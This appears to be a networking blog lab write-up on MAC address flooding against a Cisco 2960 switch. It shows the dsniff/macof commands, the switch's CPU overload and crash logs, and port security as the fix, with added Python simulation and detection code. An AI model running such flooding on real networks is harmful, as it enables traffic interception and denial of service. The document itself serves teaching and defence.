Theory
A hub is a network device that forwards received Ethernet frames to all of its ports except the one on which the frame arrived. This is not a very secure method because the traffic is sent to every port and can be captured by an attacker.
Unlike a hub, a switch forwards traffic according to the destination MAC address in the received Ethernet frame. It must be able to inspect the Ethernet header and choose the outgoing switch port in a particular VLAN. To do this it maintains a MAC address table in which it looks up the destination MAC address to find the outgoing port and the VLAN.
Below is the MAC address table of a Cisco 2960 8-port switch. Notice the last entry, the DYNAMIC one in VLAN 100, which I highlighted in red. If the switch receives a frame with destination MAC address 001a.4b79.70b8 on port Fa 0/4, it switches this frame to port Fa 0/1, provided that port Fa 0/4 is in VLAN 100.
2960-I#show mac address-table
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
All 0100.0ccc.cccc STATIC CPU
All 0100.0ccc.cccd STATIC CPU
All 0180.c200.0000 STATIC CPU
All 0180.c200.0001 STATIC CPU
All 0180.c200.0002 STATIC CPU
All 0180.c200.0003 STATIC CPU
All 0180.c200.0004 STATIC CPU
All 0180.c200.0005 STATIC CPU
All 0180.c200.0006 STATIC CPU
All 0180.c200.0007 STATIC CPU
All 0180.c200.0008 STATIC CPU
All 0180.c200.0009 STATIC CPU
All 0180.c200.000a STATIC CPU
All 0180.c200.000b STATIC CPU
All 0180.c200.000c STATIC CPU
All 0180.c200.000d STATIC CPU
All 0180.c200.000e STATIC CPU
All 0180.c200.000f STATIC CPU
All 0180.c200.0010 STATIC CPU
All ffff.ffff.ffff STATIC CPU
100 001a.4b79.70b8 DYNAMIC Fa0/1
Total Mac Addresses for this criterion: 21
If port Fa 0/4 is in VLAN 200, the switch can't use any entry in the MAC address table because there is no MAC address learned in VLAN 200. The switch needs to be sure that the frame will be delivered to the end PC, so it floods the frame to all its switch ports in that VLAN except port Fa 0/4.
How do MAC addresses get into the switch MAC address table? They can be added as static entries by the administrator:
2960-I(config)#mac address-table static 0000.aaaa.bbbb vlan 100 interface Fa 0/5
This command binds MAC address 0000.aaaa.bbbb to switch port Fa 0/5 for VLAN 100. There are now 22 MAC addresses in total in the MAC address table.
2960-I#show mac address-table
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
All 0100.0ccc.cccc STATIC CPU
All 0100.0ccc.cccd STATIC CPU
All 0180.c200.0000 STATIC CPU
All 0180.c200.0001 STATIC CPU
All 0180.c200.0002 STATIC CPU
All 0180.c200.0003 STATIC CPU
All 0180.c200.0004 STATIC CPU
All 0180.c200.0005 STATIC CPU
All 0180.c200.0006 STATIC CPU
All 0180.c200.0007 STATIC CPU
All 0180.c200.0008 STATIC CPU
All 0180.c200.0009 STATIC CPU
All 0180.c200.000a STATIC CPU
All 0180.c200.000b STATIC CPU
All 0180.c200.000c STATIC CPU
All 0180.c200.000d STATIC CPU
All 0180.c200.000e STATIC CPU
All 0180.c200.000f STATIC CPU
All 0180.c200.0010 STATIC CPU
All ffff.ffff.ffff STATIC CPU
100 0000.aaaa.bbbb STATIC Fa0/5
100 001a.4b79.70b8 DYNAMIC Fa0/1
Total Mac Addresses for this criterion: 22
MAC addresses are also learned dynamically by the switch. The switch not only looks up the destination MAC address in the Ethernet header but also learns the source MAC address of the received frame and copies it into the MAC address table. This source MAC address is the MAC of the network card (or other network device) and is remembered together with the switch port on which the frame was received and the VLAN of that port.
Dynamically learned MAC addresses are marked as DYNAMIC in the MAC address table; manually created ones are marked as STATIC.
A MAC flooding attack is a method of forcing a switch to behave as a hub. The attacked switch sends traffic to every switch port, and that traffic (phone calls, password hashes etc.) can be captured by an attacker.
The idea is simple: a switch can learn only a given number of MAC addresses because of the hardware limit of its MAC address table. Once that limit is reached, the MAC address table is full. The switch can't learn any new MAC address, and traffic is sent to every port in the VLAN where the attack started.
All the attacker needs to do is poison the switch with enough fake MAC addresses to fill up the entire MAC address table. The switch learns these fake MAC addresses, and the fake frames are also flooded to all switch ports in the particular VLAN. Other switches in the campus network learn the fake MAC addresses too and flood the fake frames further.
After some time, all the switches which have a port in the VLAN where the attack started will have a MAC address table full of fake MAC addresses. Normal user traffic in the attacker's VLAN is flooded through all the switch ports, and if the attack runs long enough the attacker can capture the data he needs.
When the attacker has captured enough data he stops the attack. After the aging time expires, the fake MAC addresses are deleted by the switch from its MAC address table.
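The behaviour described above, as an added example that is not part of the original post: a small Python model of a transparent learning switch with a hardware-limited MAC address table. It shows the three things the theory section relies on: a known destination is switched to exactly one port in its VLAN, an unknown destination is flooded to every other port of that VLAN only, and once the table is full of refreshed bogus entries while the real hosts' entries have aged out, a legitimate unicast frame is flooded like on a hub. The port names, VLAN numbers, capacity and MAC addresses are constructed for the example (a real 2960 has about 8000 entries, as the post shows later).

```python
import random

# Added example, not code from the original post: a minimal model of a learning
# switch with a hardware-limited MAC address table. Port names, VLAN numbers,
# the capacity and all MAC addresses below are constructed for illustration.


class LearningSwitch:
    def __init__(self, ports, capacity, aging_time=300):
        self.ports = dict(ports)        # port name -> access VLAN of that port
        self.capacity = capacity        # maximum number of entries in the table
        self.aging_time = aging_time    # seconds an idle DYNAMIC entry survives
        self.table = {}                 # (vlan, mac) -> {"port", "type", "seen"}

    def add_static(self, mac, vlan, port):
        # Equivalent of "mac address-table static ...": never ages out
        self.table[(vlan, mac)] = {"port": port, "type": "STATIC", "seen": None}

    def _learn(self, mac, vlan, port, now):
        entry = self.table.get((vlan, mac))
        if entry is not None:
            if entry["type"] == "DYNAMIC":          # refresh an existing entry
                entry["port"], entry["seen"] = port, now
            return True
        if len(self.table) >= self.capacity:        # table full: nothing learned
            return False
        self.table[(vlan, mac)] = {"port": port, "type": "DYNAMIC", "seen": now}
        return True

    def age_out(self, now):
        # Remove DYNAMIC entries not refreshed within aging_time; return how many
        expired = [k for k, e in self.table.items()
                   if e["type"] == "DYNAMIC" and now - e["seen"] >= self.aging_time]
        for key in expired:
            del self.table[key]
        return len(expired)

    def forward(self, in_port, src, dst, now=0):
        """Learn src on in_port, then return the list of egress ports for dst."""
        vlan = self.ports[in_port]
        self._learn(src, vlan, in_port, now)
        entry = self.table.get((vlan, dst))
        if entry is not None:
            # known destination: one port, or none if it sits on the ingress port
            return [] if entry["port"] == in_port else [entry["port"]]
        # unknown destination: flood to every other port of the same VLAN only
        return sorted(p for p, v in self.ports.items() if v == vlan and p != in_port)


def random_mac(rng):
    return ":".join("%02x" % rng.randrange(256) for _ in range(6))


def demo(capacity=50, seed=1):
    """Return (egress ports before the flood, egress ports after the table is full)."""
    rng = random.Random(seed)
    sw = LearningSwitch({"Fa0/1": 100, "Fa0/2": 100, "Fa0/3": 100, "Fa0/4": 200}, capacity)
    host_a, host_b = "00:00:00:00:00:0a", "00:00:00:00:00:0b"
    # t=0: two legitimate hosts in VLAN 100 exchange frames, so both get learned
    sw.forward("Fa0/2", host_a, host_b, now=0)
    sw.forward("Fa0/3", host_b, host_a, now=0)
    before = sw.forward("Fa0/2", host_a, host_b, now=1)   # switched to Fa0/3 only
    # t=100: frames with random source MACs arrive on Fa0/1 until the table is
    # full; these entries keep being refreshed while the real hosts stay quiet
    while len(sw.table) < capacity:
        sw.forward("Fa0/1", random_mac(rng), random_mac(rng), now=100)
    # t=310: the idle legitimate entries age out, the refreshed bogus ones do
    # not, and the freed slots are immediately taken by more bogus sources
    sw.age_out(now=310)
    while len(sw.table) < capacity:
        sw.forward("Fa0/1", random_mac(rng), random_mac(rng), now=311)
    # host_a's frame to host_b now meets a full table with no entry for host_b:
    # it is flooded out of every VLAN 100 port, including Fa0/1, but not Fa0/4
    after = sw.forward("Fa0/2", host_a, host_b, now=312)
    return before, after


if __name__ == "__main__":
    print(demo())   # (['Fa0/3'], ['Fa0/1', 'Fa0/3'])
```

The model keys the table on (VLAN, MAC) exactly as the show output above does, which is why a frame entering on a VLAN 200 port never finds the VLAN 100 entry and why flooding stays inside the VLAN of the ingress port.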
1. Installing the dsniff tool
You can perform a MAC flooding attack with a tool called macof. It is part of dsniff, which can be installed with this command on Fedora Linux:
[root@Compaq8510w brezular]# yum install dsniff
2. Checking the MAC address table and CPU load before the attack
First check how many MAC addresses are in the table:
2960-I#show mac address-table count
Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 0
Static Address Count : 0
Total Mac Addresses : 0
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 1
Static Address Count : 1
Total Mac Addresses : 2
Total Mac Address Space Available: 8046
We can see that 2 MAC addresses are present in the MAC address table for VLAN 100. The first one was dynamically learned by the switch and the second one was statically added by the administrator. There is free space for another 8046 addresses that can be added to the MAC address table.
Now check the current CPU load:
2960-I#show processes cpu
CPU utilization for five seconds: 5%/0%; one minute: 10%; five minutes: 11%
I am just curious whether the MAC flooding attack has an impact on CPU load.
3. MAC address flooding attack
a) The first MAC address flooding attack
It is time to make our first MAC flooding attack. We have a Cisco Catalyst 2960 (WS-C2960-8TC-L) with 8 FastEthernet ports; FastEthernet 0/1 is connected to a Compaq 8510w laptop running Fedora 13 Linux with dsniff installed. Start the macof utility:
[root@Compaq8510w brezular]#macof
b6:c4:3:58:97:10 4b:99:65:4b:6f:6 0.0.0.0.56527 > 0.0.0.0.53481: S 1204762615:1204762615(0) win 512
1b:1b:f2:4f:53:27 61:dd:57:7c:38:47 0.0.0.0.48781 > 0.0.0.0.64071: S 1895482790:1895482790(0) win 512
54:c0:68:51:50:85 6c:3b:12:61:8a:70 0.0.0.0.54040 > 0.0.0.0.29400: S 352722634:352722634(0) win 512
1a:7f:7c:6f:8a:50 e7:b5:16:6d:48:53 0.0.0.0.55501 > 0.0.0.0.13256: S 2142129962:2142129962(0) win 512
42:63:9e:11:e5:b9 af:9c:37:63:9a:4e 0.0.0.0.26158 > 0.0.0.0.16299: S 1230975236:1230975236(0) win 512
f8:20:8c:7b:20:c bd:e6:61:3b:2:b9 0.0.0.0.11748 > 0.0.0.0.20420: S 1638533473:1638533473(0) win 512
51:a4:d8:3d:a2:d9 9c:b6:a2:7b:27:85 0.0.0.0.33558 > 0.0.0.0.34232: S 1602379134:1602379134(0) win 512
1d:27:2f:37:e2:31 5:f6:ce:15:33:de 0.0.0.0.24142 > 0.0.0.0.26282: S 1964332936:1964332936(0) win 512
ae:43:3e:72:42:2c 5b:35:5e:16:21:5f 0.0.0.0.30837 > 0.0.0.0.41119: S 647717601:647717601(0) win 512
a0:a6:5:5c:24:c1 b3:4a:c8:78:f2:55 0.0.0.0.178 > 0.0.0.0.23826: S 804427713:804427713(0) win 512
e4:bc:7b:28:9:13 5a:89:b2:4e:af:8c 0.0.0.0.20137 > 0.0.0.0.4418: S 1360529247:1360529247(0) win 512
7a:84:58:45:ef:63 ef:5f:f7:6c:15:4b 0.0.0.0.42497 > 0.0.0.0.30053: S 728605699:728605699(0) win 512
<output is truncated>
Plenty of frames are generated by the macof utility. Macof generates between 10 000 and 15 000 packets per second. Each packet is sent with random source and destination IP addresses, and the source and destination MAC addresses are also different for each Ethernet frame.
The attack is stopped after approximately 15 seconds. These log messages appear on the switch console:
2960-I#
*Mar 1 01:08:39: %SYS-3-CPUHOG: Task is running for (2111)msecs, more than (2000)msecs (31/0),process = HLFM address learning process.
-Traceback= 5269A8 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:41: %SYS-3-CPUHOG: Task is running for (4222)msecs, more than (2000)msecs (69/0),process = HLFM address learning process.
-Traceback= 136DA74 136DB90 11614B4 116173C 4FB6F8 509698 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:44: %SYS-3-CPUHOG: Task is running for (6331)msecs, more than (2000)msecs (98/0),process = HLFM address learning process.
-Traceback= 116248C 116291C 526940 528C38 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:46: %SYS-3-CPUHOG: Task is running for (8438)msecs, more than (2000)msecs (125/0),process = HLFM address learning process.
-Traceback= 1162734 116291C 528BEC 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:48: %SYS-3-CPUHOG: Task is running for (10537)msecs, more than (2000)msecs (137/0),process = HLFM address learning process.
-Traceback= 5269AC 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
2960-I#
The MAC address learning process runs for more than 2 seconds at a time and the switch complains about it.
The output below shows the CPU utilization immediately after the end of the attack. The CPU load was 95% over the last five seconds. Apparently this high CPU utilization is caused by the MAC flooding attack.
2960-I#show processes cpu
CPU utilization for five seconds: 95%/10%; one minute: 12%; five minutes: 7%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process
1 0 8 0 0.00% 0.00% 0.00% 0 Chunk Manager
2 0 150 0 0.00% 0.00% 0.00% 0 Load Meter
3 0 2 0 0.00% 0.00% 0.00% 0 SpanTree Helper
4 1125 156 7211 0.00% 0.08% 0.05% 0 Check heaps
<output is truncated>
b) The second MAC address flooding attack
I will repeat the MAC address flooding attack to be sure that the high CPU utilization is caused by the attack. I wait a short time, and after a few seconds the CPU utilization goes back to 5% (the value before the attack). I start the second attack and show the CPU utilization immediately after the end of the flooding (Ctrl-C stops the macof utility).
2960-I#show processes cpu
CPU utilization for five seconds: 96%/10%; one minute: 12%; five minutes: 6%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process
Now we can be sure that this type of attack impacts the CPU of the Cisco Catalyst 2960 switch.
The output below shows the number of MAC addresses that we forced the switch to learn:
2960-I#show mac address-table count
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 7962
Static Address Count : 1
Total Mac Addresses : 7963
Total Mac Address Space Available: 78
The MAC address table is almost full: only 78 more MAC addresses can be added to it, and after that the switch will start flooding normal user traffic out of all its ports.
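The two "show mac address-table count" outputs (section 2 and just above) and the %SYS-3-CPUHOG messages in section 3a are exactly the signals a monitoring job should watch for. As an added example, not code from the original post or from Cisco, here is a Python parser that turns both into numbers and raises an alert when the table is nearly full. The sample texts are copied from the post's own output; the 80% threshold and the function names are assumptions made for the example.

```python
import re

# Added example (not from the original post): parse "show mac address-table
# count" output and %SYS-3-CPUHOG syslog lines into numbers a monitoring job can
# alert on. Sample texts below are copied from the post; threshold is assumed.

COUNT_BEFORE = """\
Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 0
Static Address Count : 0
Total Mac Addresses : 0
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 1
Static Address Count : 1
Total Mac Addresses : 2
Total Mac Address Space Available: 8046
"""

COUNT_AFTER = """\
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 7962
Static Address Count : 1
Total Mac Addresses : 7963
Total Mac Address Space Available: 78
"""

# Console lines as they appeared in the post (the traceback lines must be ignored)
SYSLOG_SAMPLE = [
    "*Mar 1 01:08:39: %SYS-3-CPUHOG: Task is running for (2111)msecs, more than (2000)msecs (31/0),process = HLFM address learning process.",
    "-Traceback= 5269A8 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028",
    "*Mar 1 01:08:41: %SYS-3-CPUHOG: Task is running for (4222)msecs, more than (2000)msecs (69/0),process = HLFM address learning process.",
    "*Mar 1 01:08:44: %SYS-3-CPUHOG: Task is running for (6331)msecs, more than (2000)msecs (98/0),process = HLFM address learning process.",
]

VLAN_RE = re.compile(r"Mac Entries for Vlan (\d+):")
FIELD_RE = re.compile(r"(Dynamic|Static) Address Count\s*:\s*(\d+)")
SPACE_RE = re.compile(r"Total Mac Address Space Available:\s*(\d+)")
CPUHOG_RE = re.compile(
    r"%SYS-3-CPUHOG: Task is running for \((\d+)\)msecs, more than \((\d+)\)msecs"
    r".*?process = (.+?)\.?$")


def parse_mac_count(text):
    """Return ({vlan: {"dynamic": n, "static": n}}, total_space_available)."""
    vlans, current, space = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := VLAN_RE.match(line):
            current = int(m.group(1))
            vlans[current] = {"dynamic": 0, "static": 0}
        elif (m := FIELD_RE.match(line)) and current is not None:
            vlans[current][m.group(1).lower()] = int(m.group(2))
        elif m := SPACE_RE.match(line):
            space = int(m.group(1))
    return vlans, space


def table_usage(text):
    """Return (entries in use, free entries, fraction of the table in use)."""
    vlans, space = parse_mac_count(text)
    used = sum(v["dynamic"] + v["static"] for v in vlans.values())
    return used, space, used / (used + space)     # capacity = used + free


def check_mac_table(text, threshold=0.8):
    """Alert strings for a table filled beyond threshold, naming the busiest VLAN."""
    vlans, _ = parse_mac_count(text)
    used, space, ratio = table_usage(text)
    if ratio < threshold:
        return []
    worst = max(vlans, key=lambda v: vlans[v]["dynamic"])
    return [f"MAC table {ratio:.0%} full ({used} used, {space} free); "
            f"VLAN {worst} holds {vlans[worst]['dynamic']} dynamic entries"]


def parse_cpuhog(line):
    """Return {"ran_ms", "limit_ms", "process"} for a CPUHOG line, else None."""
    m = CPUHOG_RE.search(line)
    if not m:
        return None
    return {"ran_ms": int(m.group(1)), "limit_ms": int(m.group(2)), "process": m.group(3)}


def learning_cpuhogs(lines):
    """Run times of CPUHOG events attributed to the address learning process."""
    hits = (parse_cpuhog(l) for l in lines)
    return [h["ran_ms"] for h in hits if h and "address learning" in h["process"]]


if __name__ == "__main__":
    print(check_mac_table(COUNT_BEFORE))   # []
    print(check_mac_table(COUNT_AFTER))    # one alert for VLAN 100
    print(learning_cpuhogs(SYSLOG_SAMPLE)) # [2111, 4222, 6331]
```

Polling the count output every minute and pairing a near-full table with a burst of CPUHOG messages from the learning process gives a reliable, low-noise indicator of the condition the post produces by hand, and it points at the VLAN (and, with the full table listing, the port) the bogus addresses are arriving on.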
c) The third MAC address flooding attack
In the second test we verified that the CPU of the 8-port Catalyst 2960 is impacted by the MAC flooding attack. In the third test I will keep the attack running for several minutes.
After five minutes the switch starts reloading, and after it boots this error message appears on the console:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: System previously crashed with the following message:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Technical Support: http://www.cisco.com/techsupport
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Copyright (c) 1986-2010 by Cisco Systems, Inc.
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Compiled Wed 21-Apr-10 05:52 by prod_rel_team
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Program Exception (0x0700)!
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: SRR0 = 0x031A5188 SRR1 = 0x00021200 SRR2 = 0x009F1E58 SRR3 = 0x00021200
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: ESR = 0x08000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: CPU Register Context:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Vector = 0x00000700 PC = 0x031A5188 MSR = 0x00021200 CR = 0x30000035
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: LR = 0x031A5188 CTR = 0x00000000 XER = 0xE000007D
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R0 = 0x00000001 R1 = 0x02650CD8 R2 = 0x00000000 R3 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R4 = 0x031A5188 R5 = 0x004FB830 R6 = 0x02650CA0 R7 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R8 = 0x00000000 R9 = 0x00000000 R10 = 0x019C2BFC R11 = 0x01ED4F2C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R12 = 0x01ED8698 R13 = 0x00110000 R14 = 0x01C252AC R15 = 0x01C252AC
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R16 = 0x01540000 R17 = 0x00000000 R18 = 0x00000001 R19 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R20 = 0x00000000 R21 = 0x0279A414 R22 = 0x00000000 R23 = 0x031AE004
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R24 = 0x00000002 R25 = 0x004FB830 R26 = 0x00000000 R27 = 0x01ED81F4
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R28 = 0x031A5188 R29 = 0x0264CD3C R30 = 0x031A5188 R31 = 0x0264CD3C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Stack trace:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: PC = 0x031A5188, SP = 0x02650CD8
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 00: SP = 0x02650D08 PC = 0x0000004D
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 01: SP = 0x02650D28 PC = 0x0116291C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 02: SP = 0x02650D38 PC = 0x004FB834
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 03: SP = 0x02650DA8 PC = 0x00509AB4
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 04: SP = 0x02650DE8 PC = 0x0016D8C8
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 05: SP = 0x02650E18 PC = 0x0016F058
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 06: SP = 0x02650E68 PC = 0x00502F7C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 07: SP = 0x02650E98 PC = 0x005032FC
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 08: SP = 0x02650EE8 PC = 0x0050343C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 09: SP = 0x02650F48 PC = 0x004FF06C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 10: SP = 0x02650F70 PC = 0x004FF1F0
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 11: SP = 0x02650F78 PC = 0x011BB59C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 12: SP = 0x00000000 PC = 0x011B2028
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
2960-I#
I repeated the third attack three times: twice the switch crashed after five minutes and once it kept working. I can't say that the switch crash is caused by the MAC flooding attack, but I think it might help a lot.
In theory, during a MAC address flooding attack the switch normally continues working, except that it floods the traffic out of its ports (like a hub).
4. Protection
We can prevent the MAC address flooding attack by configuring port security on the switch port.
2960-I(config-if)#do show run int fa 0/1
Building configuration...
Current configuration : 159 bytes
!
interface FastEthernet0/1
switchport access vlan 100
switchport mode access
switchport nonegotiate
switchport port-security
spanning-tree portfast
end
With only one line of configuration (switchport port-security) we limit the port to one MAC address, which is the default maximum:
2960-I#show port-security interface fastEthernet 0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 1
Total MAC Addresses : 0
Configured MAC Addresses : 0
Sticky MAC Addresses : 0
Last Source Address:Vlan : 0000.0000.0000:0
Security Violation Count : 0
If frames with two different source MAC addresses appear on Fa 0/1, the port is put into the error-disabled state, and only the administrator or the error-recovery mechanism can bring the port up again.
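As an added example, not the switch's own code or anything from the original post, here is a Python model of the port-security behaviour shown above: a default maximum of one secure MAC address and the shutdown violation mode that err-disables the port on the second distinct source MAC. It goes a little beyond the post by also modelling the restrict and protect violation modes that Cisco IOS offers alongside shutdown (both drop the offending frames without taking the port down; restrict counts violations, protect does not). Port names, MAC addresses and the method names are constructed for the example.

```python
# Added example (not the switch's or the post's code): per-port port security
# with a maximum secure-address count and the three Cisco violation modes.
# Port names and MAC addresses below are constructed for illustration.


class SecurePort:
    MODES = ("shutdown", "restrict", "protect")

    def __init__(self, name, maximum=1, violation="shutdown"):
        if violation not in self.MODES:
            raise ValueError(f"unknown violation mode {violation!r}")
        self.name = name
        self.maximum = maximum              # "Maximum MAC Addresses" in the show output
        self.violation = violation          # "Violation Mode"
        self.secure_macs = []               # dynamically learned secure addresses
        self.status = "Secure-up"           # becomes "Secure-shutdown" when err-disabled
        self.violation_count = 0            # "Security Violation Count"
        self.last_source = None             # "Last Source Address"

    def ingress(self, src_mac):
        """Return 'forward' or 'drop' for a frame arriving with this source MAC."""
        if self.status == "Secure-shutdown":
            return "drop"                   # err-disabled: nothing passes until recovered
        self.last_source = src_mac
        if src_mac in self.secure_macs:
            return "forward"                # already a secure address on this port
        if len(self.secure_macs) < self.maximum:
            self.secure_macs.append(src_mac)   # learn it as a secure address
            return "forward"
        # A new source MAC beyond the maximum: a security violation
        if self.violation == "shutdown":
            self.status = "Secure-shutdown"    # port goes err-disabled
            self.violation_count += 1
        elif self.violation == "restrict":
            self.violation_count += 1          # frame dropped, violation counted
        # protect: frame dropped silently, no counter, port stays up
        return "drop"

    def admin_recover(self):
        """'shutdown' / 'no shutdown' by the administrator, or errdisable recovery.
        Dynamically learned secure addresses are forgotten when the port goes down
        (sticky addresses, which the post does not use, would be kept)."""
        self.status = "Secure-up"
        self.secure_macs.clear()

    def show(self):
        """Fields in the spirit of 'show port-security interface'."""
        return {
            "Port Status": self.status,
            "Violation Mode": self.violation.capitalize(),
            "Maximum MAC Addresses": self.maximum,
            "Total MAC Addresses": len(self.secure_macs),
            "Last Source Address": self.last_source or "0000.0000.0000",
            "Security Violation Count": self.violation_count,
        }


def simulate(mode, sources, maximum=1, name="Fa0/1"):
    """Feed a sequence of source MACs to one port; return (decisions, port)."""
    port = SecurePort(name, maximum=maximum, violation=mode)
    return [port.ingress(mac) for mac in sources], port


if __name__ == "__main__":
    hosts = ["0000.aaaa.0001", "0000.aaaa.0001", "0000.bbbb.0002", "0000.aaaa.0001"]
    decisions, port = simulate("shutdown", hosts)
    print(decisions)            # ['forward', 'forward', 'drop', 'drop']
    print(port.show())          # Port Status: Secure-shutdown, violation count 1
```

In shutdown mode a single stray MAC takes the port down, which is why the first two frames from the legitimate host pass and everything after the violation, including that same host's traffic, is dropped until the port is recovered. With a few thousand random source MACs per second, as in the attack above, the port is err-disabled on the second frame and the MAC address table never grows.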
End.